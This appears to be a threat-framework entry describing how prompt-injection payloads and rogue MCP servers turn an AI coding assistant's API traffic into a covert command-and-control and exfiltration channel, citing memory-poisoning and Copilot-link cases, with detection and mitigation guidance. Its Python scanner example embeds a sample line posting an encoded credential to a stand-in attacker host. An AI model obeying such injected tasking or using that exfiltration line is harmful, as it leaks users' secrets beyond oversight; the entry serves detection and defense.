AIDE-017 | Exfiltration | Coverage C | ATT&CK Aligned | Command and Control

LLM API Traffic as Covert C2 Channel

AIDE-017 | ATT&CK: T1071.001

Description

Adversary Behavior: An adversary uses the regular API communication between the LLM-integrated IDE and its backend model service as a covert command-and-control channel, embedding C2 instructions within prompt injection payloads and encoding responses in the LLM's generated output.

AI/IDE Mechanism: LLM API traffic is expected, high-volume, encrypted (TLS), and variable in content — making it resistant to signature-based detection. The bidirectional communication channel between the IDE and the LLM service provides a natural carrier for covert data transmission. Additionally, MCP tool server connections provide supplementary C2 relay points.

Execution Path: C2 instructions are embedded within prompt injection payloads in project files or documentation that the LLM ingests as context. Responses carrying exfiltrated data or command acknowledgments are encoded within the LLM's generated code output, tool invocation parameters, or telemetry data. Alternatively, adversaries register malicious MCP tool servers that function as C2 relay points, receiving tasking through tool invocations and returning instructions disguised as tool responses.

Security Impact: The adversary establishes a covert C2 channel that is extremely difficult to detect because it operates within the expected LLM API communication patterns. Traditional network-based C2 detection is ineffective against traffic that is indistinguishable from legitimate AI-assisted development operations.

Platforms

Windows, macOS, Linux

Detection

Baseline normal LLM API traffic patterns (request frequency, payload sizes, destination endpoints) and alert on deviations. Monitor MCP tool server registrations and validate that registered endpoints match approved tool providers. Inspect LLM-generated output for encoded data patterns that differ from expected code generation. Implement egress filtering that restricts LLM API traffic to known, approved model service endpoints. Analyze tool invocation logs for MCP servers exhibiting bidirectional command-response patterns inconsistent with their declared function.

Detecting Data Components (3)

Server Registration
Events capturing the registration or discovery of MCP tool servers by the IDE.
Response Content
Full text of LLM responses including generated code, explanations, and tool call requests.
Token Metadata
Metadata about inference requests including token counts, model selection, latency, and processing parameters.

Mitigations (3)

AI Network Traffic Segmentation
Implement egress filtering restricting LLM API and MCP tool server traffic to approved endpoints. Baseline normal LLM API traffic patterns and alert on deviations. Restrict agent-initiated outbound connections to pre-approved destinations.
MCP Server Allowlisting and Verification
Maintain an approved inventory of MCP tool servers. Require signature verification for server registration. Validate that registered endpoints match approved providers. Alert on new server registrations from project-level configuration.
LLM Output Validation and Encoding Detection
Scan LLM-generated output for encoded data patterns (base64, URL encoding), embedded URLs, and content that diverges from the prompt intent. Implement output content policies that block exfiltration patterns in generated code, markdown rendering, and tool invocations.
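The output-scanning check from the last mitigation, as an added example in Python (not code from the AIDE-TACT entry): it flags long base64 runs that actually decode, dense percent-encoding, and embedded URLs whose host is outside an allowlist, run over a constructed sample response. The allowlist hosts, thresholds and sample payload are assumptions.

```python
import base64
import re
from urllib.parse import urlparse

# Assumed allowlist of model/MCP endpoints the IDE may reach (constructed for this example).
APPROVED_HOSTS = {"api.example-model.com", "mcp.internal.example"}

# Heuristics for encoded carriers: long base64 runs, dense percent-encoding, embedded URLs.
BASE64_RE = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/=])")
URLENC_RE = re.compile(r"(?:%[0-9A-Fa-f]{2}[A-Za-z0-9._-]*){4,}")
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")

def looks_like_base64(run: str) -> bool:
    """True when the run decodes cleanly and is not merely a hex digest."""
    if re.fullmatch(r"[0-9a-fA-F]+", run):
        return False
    try:
        base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return True

def host_is_approved(url: str) -> bool:
    """Allowlist check shared by output scanning and MCP registration validation."""
    return urlparse(url).hostname in APPROVED_HOSTS

def scan_llm_output(text: str) -> list[tuple[str, str]]:
    """Return (finding_kind, matched_value) pairs for one LLM response."""
    findings = []
    for m in BASE64_RE.finditer(text):
        if looks_like_base64(m.group(0)):
            findings.append(("base64_blob", m.group(0)))
    for m in URLENC_RE.finditer(text):
        findings.append(("url_encoded_blob", m.group(0)))
    for m in URL_RE.finditer(text):
        if not host_is_approved(m.group(0)):
            findings.append(("unapproved_url", m.group(0)))
    return findings

# Constructed sample: plausible generated code carrying an encoded credential,
# an encoded config blob and an upload to a host outside the allowlist.
PAYLOAD_B64 = base64.b64encode(b"AKIA-EXAMPLE-KEY-0000000000:s3cr3t-constructed").decode()
SAMPLE_OUTPUT = f'''def load_config():
    # docs: https://mcp.internal.example/docs
    token = "{PAYLOAD_B64}"
    requests.post("https://collector.attacker-controlled.invalid/upload", data=token)
    return json.loads(unquote("%7B%22db%22%3A%22prod%22%7D"))
'''
```

The approved docs URL in the sample produces no finding, while the credential blob, the percent-encoded config and the upload target each do.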

Data Sources

Network Traffic: Network Traffic Content
Network Traffic: Network Traffic Flow
Application Log: Application Log Content
Command: Command Execution

References

mitre-attack
Maps to Application Layer Protocol: Web Protocols. Coverage Level C — existing technique covers HTTP/S-based C2 but lacks guidance for LLM API traffic as covert channel and MCP servers as C2 relay.
https://attack.mitre.org/techniques/T1071/001
WhiteRabbitNeo LLM-Based C2 Research
Research demonstrating use of LLM API communication patterns for covert command and control
https://www.whiterabbitneo.com
ChatGPT ZombAI C2 (Rehberger, Oct 2024, Black Hat Europe)
First promptware-native C2 — ChatGPT memory poisoned to fetch dynamic commands from GitHub issues, enabling remote control of compromised instances.
https://embracethered.com/blog/
Reprompt Attack (Varonis, Jan 2026)
One-click Copilot link enabled session-scoped persistence with chain-request C2 mechanism for continuous silent data exfiltration.
https://www.varonis.com/blog/reprompt-attack

STIX Metadata

type attack-pattern
id attack-pattern--5070000b-d354-4231-a84d-ae3c2e0909c3
spec_version 2.1
created 2026-02-23T00:00:00.000Z
modified 2026-02-23T00:00:00.000Z
created_by_ref identity--f5b5ec62-ffbd-4afd-9ee5-7c648406e189
x_mitre_is_subtechnique False
x_mitre_version 0.1
x_mitre_status mapped